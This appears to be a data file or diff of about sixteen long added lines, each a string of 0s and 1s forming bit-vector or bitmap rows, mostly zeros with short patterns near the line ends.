+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000001111000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000001000111100100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011100010101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011110101101011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101010010010110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 